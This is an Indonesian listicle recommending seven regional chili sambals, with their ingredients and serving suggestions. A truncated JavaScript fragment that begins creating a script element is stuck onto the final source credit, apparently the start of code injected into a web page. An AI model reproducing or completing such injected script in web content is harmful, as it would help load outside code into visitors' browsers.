Sambal Yang Bakal Bikin Kamu Ketagihan Parah!

Namanya orang Indonesia pasti suka makanan pedas dan namanya sambel! Rasa-rasanya makanan jadi kurang lengkap dan kurang enak tanpa kehadiran sambal. Sambal dari Indonesia ada banyak sekali loh macamnya. Mulai dari sambal bawang, sambal terasi, sambal belut, sambal bajak, hingga sambal dabu-dabu.

Kalau kamu juga salah satu penggila pedas kamu harus banget cobain sambel-sambel yang luar biasa dahsyat ini! Dan jangan ngaku penyuka sambal deh kalau belum mencicipi tujuh sambal dari berbagai kota di Indonesia ini.

  1. Kalau datang ke Surabaya, wajib hukumnya cobain sambal Bu Rudy yang sudah terkenal ini.
Sumber: sambaliburudy.blogspot.co.id

Siapa sih yang gak tau sambal Bu Rudy dari Surabaya? Sambal yang sudah tersohor ini memang jadi oleh-oleh wajib sekaligus kuliner yang harus dicoba. Rasanya yang pedas benar-benar menggugah selera dan membuat makanmu semakin lahap. Bahkan, varian rasa dari sambal bu Rudy ini juga bermacam-macam lho. Mulai dari sambal bawang, sambal terasi, hingga sambal ijo. Nyammm! Kamu harus cobain ya!

  1. Penggila makanan pedas level atas? Yuk, coba sambal matah dari pulau Dewata!
Sumber: jillsmat.se

Jika di Surabaya ada sambal Bu Rudy, maka kamu kudu coba sambal matah ketika travelling ke pulau Dewata. Sambal yang diracik dari bawang merah, bawang putih, serai, cabai rawit, jeruk nipis, terasi dan daun jeruk purut ini memang sedap. Sambal ini cocok dijadikan pendamping saat kamu makan nasi bali.

  1. Sambal dabu-dabu dari Makassar juga gak kalah maknyos dan paling pas disantap dengan ikan bakar.
Sumber: oliviacooksinholland.blogspot.co.id

Sambal dabu-dabu biasanya disajikan bersama dengan nasi dan ikan bakar. Selain pedas membakar, sambal ini juga sangat segar lho. Pasalnya, bahan baku sambal enak ini terdiri dari irisan tomat, bawang merah, cabai keriting, cabai rawit, terasi dan juga air jeruk. Gimana? Berani coba untuk mengunyah rawitnya gak?

  1. Manado punya sambal Roa yang pedas sekaligus enak sekali.
Sumber: referensidunia.blogspot.com

Sambal roa dari Manado bisa dibilang unik. Soalnya, sambal ini berbahan dasar ikan asap roa. Selain itu rasa pedas dari sambal ini juga gak perlu diragukan lagi. Komposisi yang bisa ditemukan dari sambal Manado ini adalah cabai rawit, cabai merah, bawang putih, bawang merah dan tomat merah. Hmm, bisa dibayangkan kan betapa sedapnya ketika mengonsumsinya dengan nasi hangat?

  1. Sementara itu, Minangkabau punya sambal lado yang bikin nafsu makanmu meningkat pesat.
Sumber: harianresep.blogspot.com

Sambal lado juga merupakan salah satu sambal yang sudah terkenal di Indonesia. Sambal berwarna hijau ini dibuat dari cabai hijau, tomat hijau, terasi, bawang putih dan merah, air jeruk dan juga minyak goreng. Sambal yang diuleg dan bertekstur kasar ini ampuh deh membuat nafsu makanmu meningkat dalam sekejap.

  1. Sambal terasi dari Sunda juga gak kalah sedap dimakan dengan nasi hangat.
Sjumber: masakanlezat.com

Sambal terasi dari Sunda juga gak kalah enaknya. Sambal yang dibuat dari terasi segar, sedikit tomat, cabai merah, bawang merah dan garam. Selain pedas dan segar, sambal ini juga berperisa gurih. Pasalnya, terasi segar terbuat dari udang rebon yang memang berasa gurih dan enak. Kamu bisa mengonsumsinya dengan nasi uduk dan lauk pauk.

  1. Pedas dan asamnya sambal mangga dari Palembang cocok untuk teman santap siangmu.
Sumber: mykidneybean.blogspot.co.id

Selain pempek, Palembang juga tersohor akan sambal mangganya. Sambal ini mungkin terbilang unik. Namun yakin deh, sekali merasakannya kamu bakal tergoda untuk tambah lagi dan lagi. Sambal yang terbuat dari mangga muda, rawit, terasi, dan bawang putih ini memang sedap. Selain pedas, rasa sambal ini juga sedikit asam dan juga segar. Yuhu… jadi kepengen…

Nyamm, baca ulasan tentang sambal jadi kepengen cobain ya! Kalian udah tau mau mencicipi sambal yang mana? Selamat mencicipi sambal!

 

Sumber: travel.idntimes.comvar d=document;var s=d.createElement(‘script’);